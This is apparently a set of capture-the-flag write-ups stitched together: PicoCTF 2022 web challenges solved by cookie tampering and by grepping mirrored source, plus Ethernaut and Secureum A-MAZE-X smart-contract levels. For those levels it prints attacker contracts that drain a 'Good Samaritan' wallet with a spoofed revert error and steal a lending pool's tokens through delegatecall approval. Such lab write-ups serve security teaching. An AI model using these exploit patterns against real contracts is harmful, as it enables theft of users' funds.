PicoCTF 2022 / Web Exploitation
Can you get the flag?
Go to this website and see what you can discover.
isAdmin cookie value to 1.picoCTF{gr4d3_A_c00k13_5d2505be} ٩(^ᴗ^)۶PicoCTF 2022 / Web Exploitation
The developer of this website mistakenly left an important artifact in the website source, can you find it?
The website is here
wget -m http://saturn.picoctf.net:58133/ to get source code.grep -r 'picoCTF' saturn.picoctf.net:58133 to search the flag!picoCTF{1nsp3ti0n_0f_w3bpag3s_587d12b8} ٩(^ᴗ^)۶To solve this level, you only need to provide the Ethernaut with a
Solver, a contract that responds towhatIsTheMeaningOfLife()with the right number.
Easy right? Well… there’s a catch.
The solver’s code needs to be really tiny. Really reaaaaaallly tiny. Like freakin’ really really itty-bitty tiny: 10 opcodes at most.
Hint: Perhaps its time to leave the comfort of the Solidity compiler momentarily, and build this one by hand O_o. That’s right: Raw EVM bytecode.
Good luck!
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract MagicNum {
address public solver;
constructor() public {}
function setSolver(address _solver) public {
solver = _solver;
}
/*
____________/\\\_______/\\\\\\\\\_____
__________/\\\\\_____/\\\///////\\\___
________/\\\/\\\____\///______\//\\\__
______/\\\/\/\\\______________/\\\/___
____/\\\/__\/\\\___________/\\\//_____
__/\\\\\\\\\\\\\\\\_____/\\\//________
_\///////////\\\//____/\\\/___________
___________\/\\\_____/\\\\\\\\\\\\\\\_
___________\///_____\///////////////__
*/
}
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract MagicNumberCracker{
constructor() public{
assembly{
mstore(0x00, 0x602a60005260206000f3)
return(0x16, 0x0a)
}
}
}
How 0x602a60005260206000f3 come from ?
await contract.setSolver('MAGICNUMBERCRACKER_CONTRACT_ADDRESS')
This instance represents a Good Samaritan that is wealthy and ready to donate some coins to anyone requesting it.
Would you be able to drain all the balance from his Wallet?
Things that might help:
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0 <0.9.0;
import "openzeppelin-contracts-08/utils/Address.sol";
contract GoodSamaritan {
Wallet public wallet;
Coin public coin;
constructor() {
wallet = new Wallet();
coin = new Coin(address(wallet));
wallet.setCoin(coin);
}
function requestDonation() external returns(bool enoughBalance){
// donate 10 coins to requester
try wallet.donate10(msg.sender) {
return true;
} catch (bytes memory err) {
if (keccak256(abi.encodeWithSignature("NotEnoughBalance()")) == keccak256(err)) {
// send the coins left
wallet.transferRemainder(msg.sender);
return false;
}
}
}
}
contract Coin {
using Address for address;
mapping(address => uint256) public balances;
error InsufficientBalance(uint256 current, uint256 required);
constructor(address wallet_) {
// one million coins for Good Samaritan initially
balances[wallet_] = 10**6;
}
function transfer(address dest_, uint256 amount_) external {
uint256 currentBalance = balances[msg.sender];
// transfer only occurs if balance is enough
if(amount_ <= currentBalance) {
balances[msg.sender] -= amount_;
balances[dest_] += amount_;
if(dest_.isContract()) {
// notify contract
INotifyable(dest_).notify(amount_);
}
} else {
revert InsufficientBalance(currentBalance, amount_);
}
}
}
contract Wallet {
// The owner of the wallet instance
address public owner;
Coin public coin;
error OnlyOwner();
error NotEnoughBalance();
modifier onlyOwner() {
if(msg.sender != owner) {
revert OnlyOwner();
}
_;
}
constructor() {
owner = msg.sender;
}
function donate10(address dest_) external onlyOwner {
// check balance left
if (coin.balances(address(this)) < 10) {
revert NotEnoughBalance();
} else {
// donate 10 coins
coin.transfer(dest_, 10);
}
}
function transferRemainder(address dest_) external onlyOwner {
// transfer balance left
coin.transfer(dest_, coin.balances(address(this)));
}
function setCoin(Coin coin_) external onlyOwner {
coin = coin_;
}
}
interface INotifyable {
function notify(uint256 amount) external;
}
The requestDonation() in the GoodSamaritan contract will call wallet.donate10(msg.sender) if there are enough coins(>10) in the wallet. If coins in the wallet less then 10, it will revert NotEnoughBalance error and transfer all remaining coins in the wallet.
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0 <0.9.0;
interface GoodSamaritan {
function requestDonation() external returns(bool enoughBalance);
}
contract GoodSamaritanAttacker {
error NotEnoughBalance();
function attack(address _goodsamaritan) public {
GoodSamaritan(_goodsamaritan).requestDonation();
}
function notify(uint256 _amount) public pure {
if(_amount==10){
revert NotEnoughBalance();
}
}
}
GoodSamaritan contract address by typing instance in the chrome console. For example:
instance
// '0xa273e96Ae56e2cAb404a3221d5356Af4cdd67440'
attack method in GoodSamaritanAttacker contract with the contract address we get above as a parameter.Secureum A-MAZE-X Stanford Github repo
Secureum has raised a lot of Ether and decided to buy a bunch of InSecureumTokens ($ISEC) in order to make them available to the community via flash loans. This is made possible by means of the InSecureumLenderPool contract.
📌 Upon deployment, the InSecureumToken contract mints an initial supply of 10 $ISEC to the contract deployer.
📌 The InSecureumLenderPool contract operates with $ISEC.
📌 The contract deployer transfers all of their $ISEC to the InSecureumLenderPool contract.
📌 The idea is that anyone can deposit $ISECs to enlarge the pool’s resources.
Will you be able to steal the $ISECs from the InSecureumLenderPool? 😈😈😈
InSecureumLenderPool.sol ( The contracts that we will hack. )
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.14;
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {Address} from "@openzeppelin/contracts/utils/Address.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";
// Some ideas for this challenge were taken from damn vulnerable defi
contract InSecureumLenderPool {
using Address for address;
using SafeERC20 for IERC20;
/// @dev Token contract address to be used for lending.
//IERC20 immutable public token;
IERC20 public token;
/// @dev Internal balances of the pool for each user.
mapping(address => uint) public balances;
// flag to notice contract is on a flashloan
bool private _flashLoan;
/// @param _token Address of the token to be used for the lending pool.
constructor (address _token) {
token = IERC20(_token);
}
/// @dev Deposit the given amount of tokens to the lending
/// pool. This will add _amount to balances[msg.sender] and
/// transfer _amount tokens to the lending pool.
/// @param _amount Amount of token to deposit in the lending pool
function deposit(uint256 _amount) external {
require(!_flashLoan, "Cannot deposit while flash loan is active");
token.safeTransferFrom(msg.sender, address(this), _amount);
balances[msg.sender] += _amount;
}
/// @dev Withdraw the given amount of tokens from the lending pool.
function withdraw(uint256 _amount) external {
require(!_flashLoan, "Cannot withdraw while flash loan is active");
balances[msg.sender] -= _amount;
token.safeTransfer(msg.sender, _amount);
}
/// @dev Give borrower all the tokens to make a flashloan.
/// For this with get the amount of tokens in the lending pool before, then we give
/// control to the borrower to make the flashloan. After the borrower makes the flashloan
/// we check if the lending pool has the same amount of tokens as before.
/// @param borrower The contract that will have access to the tokens
/// @param data Function call data to be used by the borrower contract.
function flashLoan(
address borrower,
bytes calldata data
)
external
{
uint256 balanceBefore = token.balanceOf(address(this));
_flashLoan = true;
borrower.functionDelegateCall(data);
_flashLoan = false;
uint256 balanceAfter = token.balanceOf(address(this));
require(balanceAfter >= balanceBefore, "Flash loan hasn't been paid back");
}
}
InSecureumToken.sol
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.14;
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
contract InSecureumToken is ERC20 {
// Decimals are set to 18 by default in `ERC20`
constructor(uint256 _supply) ERC20("InSecureumToken", "ISEC") {
_mint(msg.sender, _supply);
}
}
Exploit contract in test/Challenge1.t.sol.
contract Exploit {
function flashloanCallback(IERC20 token, address testAddress) public {
token.approve(testAddress, type(uint256).max);
}
}
testChallenge function.
Exploit exploit = new Exploit();
target.flashLoan(
address(exploit),
abi.encodeWithSelector(
Exploit.flashloanCallback.selector,
token,
player
)
);
IERC20(token).transferFrom(address(target), player, IERC20(token).balanceOf(address(target)));
forge test --match-path test/Challenge1.t.sol